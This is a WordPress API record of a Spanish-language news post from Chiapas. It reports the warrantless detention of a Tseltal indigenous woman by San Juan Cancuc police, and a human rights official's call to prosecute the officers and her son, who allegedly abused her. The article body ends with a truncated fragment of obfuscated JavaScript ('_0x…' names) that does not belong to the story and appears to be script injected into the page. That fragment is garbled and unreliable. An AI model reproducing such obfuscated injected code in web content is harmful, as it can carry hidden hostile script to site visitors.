{"id":9010,"date":"2023-03-11T03:42:58","date_gmt":"2023-03-11T03:42:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9010"},"modified":"2023-03-11T03:42:59","modified_gmt":"2023-03-11T03:42:59","slug":"encarcelan-a-mujer-tseltal-de-cancuc-en-el-dia-internacional-de-la-mujer","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9010","title":{"rendered":"Encarcelan a mujer Tseltal de Cancuc en el D\u00eda internacional de la Mujer"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"719\" height=\"858\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-10-at-5.01.53-PM.jpeg\" alt=\"\" class=\"wp-image-9011\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-10-at-5.01.53-PM.jpeg 719w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-10-at-5.01.53-PM-251x300.jpeg 251w\" sizes=\"auto, (max-width: 719px) 100vw, 719px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal10 de Marzo del 2023. San Crist\u00f3bal de Las Casas.- Jorge S\u00e1nchez, presidente de la Comisi\u00f3n Internacional de Derechos Humanos de la regi\u00f3n sureste de M\u00e9xico, pidi\u00f3 a la Fiscal\u00eda de Justicia de Chiapas, se actu\u00e9 en contra del Director de la Polic\u00eda Municipal de San Juan Cancuc, Miguel L\u00f3pez, quien el pasado 8 de marzo, encarcel\u00f3 a Mar\u00eda \u201cN\u201d, sin tener ninguna orden de aprehensi\u00f3n, as\u00ed como todos aquellos involucrados en el tema.Explic\u00f3 que la se\u00f1ora Mar\u00eda \u201cN\u201d una mujer ind\u00edgena Tseltal del municipio de San Juan Cancuc, ha sido violentada  por un sujeto de nombre Miguel \u201cN\u201d, su propio hijo quien intenta despojarla de un predio, logrando confrontarse con sus propios hermanos, al grado incluso de intentar violar a su propia madre.\u201cEste sujeto lleg\u00f3 y golpe\u00f3 a su madre en el municipio de San Juan Cancuc, fue denunciado desde hace m\u00e1s de 2 a\u00f1os, la carpeta de investigaci\u00f3n como siempre en las fiscal\u00edas se retrasa su integraci\u00f3n, sin embargo se logr\u00f3 obtener la orden de aprehensi\u00f3n, la cual hasta la fecha no ha sido cumplimentada, a su vez este fulano denunci\u00f3 a la mama y los hermanos  por despojo agravado, denuncia que no prospero\u201d, dijo.Record\u00f3 como el sujeto en menci\u00f3n, al ver que no pod\u00eda actuar en contra de su propia madre, intent\u00f3 abusar sexualmente de ella, lo cual se denunci\u00f3, pero que dicha carpeta se qued\u00f3 parada en las fiscal\u00edas.Hizo saber que el pasado 8 de marzo, en el marco del d\u00eda internacional de la mujer, la se\u00f1ora fue detenida por polic\u00edas municipales de Cancuc, donde el director es Miguel L\u00f3pez S\u00e1ntiz, y el polic\u00eda Manuel Hern\u00e1ndez Aguilar, acompa\u00f1ados del propio hijo de la mujer\u201cLa encierran en los separos de la c\u00e1rcel municipal de ese lugar, su servidor habla y me argumentan que tienen la orden de aprehensi\u00f3n, pero al ver que se trataba de una llamada de la Comisi\u00f3n Internacional de Derechos Humanos, toman la nota ya m\u00e1s delicado\u201d, abund\u00f3, adem\u00e1s de subrayar que fue gracias al apoyo del fiscal ind\u00edgena que se logra la libertad de la mujer, quien confirm\u00f3 que no exist\u00eda ninguna orden de aprehensi\u00f3n.Pidi\u00f3 a las autoridades de la fiscal\u00eda, hagan su trabajo, y procedan jur\u00eddicamente en contra de los polic\u00edas  e involucrados en la detenci\u00f3n sin ninguna orden, adem\u00e1s por proteger a Miguel \u201cN\u201d, quien adem\u00e1s tiene una orden de aprehensi\u00f3n que no se ha ejecutado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal10 de Marzo del 2023. San Crist\u00f3bal de Las Casas.- Jorge S\u00e1nchez, presidente de la Comisi\u00f3n Internacional de Derechos Humanos de la regi\u00f3n sureste de M\u00e9xico, pidi\u00f3 a la Fiscal\u00eda de Justicia de Chiapas, se actu\u00e9 en contra del Director de la Polic\u00eda Municipal de San Juan Cancuc, Miguel L\u00f3pez, quien el pasado 8 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9011,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9010","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9010"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9010\/revisions"}],"predecessor-version":[{"id":9012,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9010\/revisions\/9012"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9011"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9010"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}